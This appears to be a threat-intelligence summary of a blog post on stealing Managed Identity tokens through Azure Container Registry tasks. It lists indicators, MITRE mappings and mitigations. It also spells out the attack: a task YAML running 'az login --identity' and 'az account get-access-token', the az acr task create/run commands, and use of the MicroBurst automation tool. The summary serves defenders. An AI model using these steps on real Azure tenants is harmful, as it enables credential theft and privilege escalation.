Keypoints
- Attackers with Contributor (write) access on an ACR can create tasks that run arbitrary commands inside the ACR task container.
- Malicious task YAML can call az login –identity and az account get-access-token to obtain tokens for attached Managed Identities.
- MicroBurst includes Invoke-AzACRTokenGenerator to automate creating tasks, running them, and collecting tokens using Az PowerShell cmdlets and REST APIs.
- The tool prompts interactively for subscriptions and ACR targets (supports multi-select) and can generate tokens for configurable scopes (e.g., management endpoint).
- Task runs produce output (including tokens) that can be read from the run logs; runs persist even if the task is deleted, potentially exposing tokens to Readers.
- IoCs provided include specific Azure activity log operations to monitor (task creation, schedule run, listLogSasUrl, task delete).
- Recommended mitigations: review and tighten permissions on ACRs, attached Managed Identities, stored task definitions, and monitor the listed activity operations.
MITRE Techniques
- [T1078] Valid Accounts – The attack requires an account with Contributor (Write) access on the ACR (“The attacker has Contributor (Write) access on the ACR”).
- [T1550.003] Use of Cloud Accounts – The task authenticates as the Managed Identity and requests tokens (“…the task authenticates to the Az CLI as the Managed Identity, then generates a token”).
- [T1059.001] Command and Scripting Interpreter: PowerShell – MicroBurst uses Az PowerShell module cmdlets and the attack uses command-line actions inside task YAML (“uses a mix of the Az PowerShell module cmdlets and REST API calls” and “‘az login –identity’ ‘az account get-access-token’”).
- [T1574] Hijack Execution Flow – Creating malicious ACR Tasks to execute attacker-chosen commands in the registry task environment (“The attacker creates a malicious YAML task file” and the task runs inside the ACR Task container to output tokens).
Indicators of Compromise
- [Azure Activity Operation Names] operations that indicate task creation/run/log access – Microsoft.ContainerRegistry/registries/tasks/write, Microsoft.ContainerRegistry/registries/scheduleRun/action, and Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action (plus Microsoft.ContainerRegistry/registries/tasks/delete).
- [Task/file names] ACR task and YAML artifacts – .taskfile, sample_acr_task (example task name used to create/run/delete the malicious task).
- [CLI commands / YAML snippets] commands used to obtain tokens – ‘az login –identity’, ‘az account get-access-token’ shown in the task YAML and used to retrieve Managed Identity tokens.
- [Tooling] automation function and module – Invoke-AzACRTokenGenerator, Import-Module .MicroBurstAzInvoke-AzACRTokenGenerator.ps1 (tool and import example).
To perform the token-extraction procedure via the Azure CLI, authenticate with an account that has Contributor access to the target ACR, list registries (az acr list), and create a local YAML task file containing commands to authenticate as the registry’s Managed Identity and request a token (for example: version: v1.1.0 steps: – cmd: az login –identity –allow-no-subscriptions – cmd: az account get-access-token). If using a user-assigned managed identity, add –username to the az login command. Create the task with az acr task create –registry $ACRName –name sample_acr_task –file .taskfile –context /dev/null –only-show-errors –assign-identity [system] (or replace [system] with the full resource path for a user-assigned identity), then run it with az acr task run -n sample_acr_task -r $acrName. The task run output includes the generated token; after retrieval you can delete the task with az acr task delete -n sample_acr_task -r $acrName -y, noting that runs (and their logs) remain visible in the registry.
MicroBurst’s Invoke-AzACRTokenGenerator automates these steps using Az PowerShell cmdlets and REST API calls. Import the function (Import-Module .MicroBurstAzInvoke-AzACRTokenGenerator.ps1) and run Invoke-AzACRTokenGenerator -Verbose; the function interactively prompts for subscription(s) and ACR targets (supports multi-selection), allows specifying a token scope (default: https://management.azure.com/), and returns a DataTable object you can assign to $tokens (or append tokens with +=) to store tokens for multiple scopes such as Management, Graph, or Key Vault.
Defenders should monitor the Azure activity operations listed above, review permissions on ACRs and attached Managed Identities, inspect stored task files (including those in GitHub) for malicious YAML, and limit Contributor-level access to registries. Read more: https://www.netspi.com/blog/technical/cloud-penetration-testing/automating-managed-identity-token-extraction-in-azure-container-registries/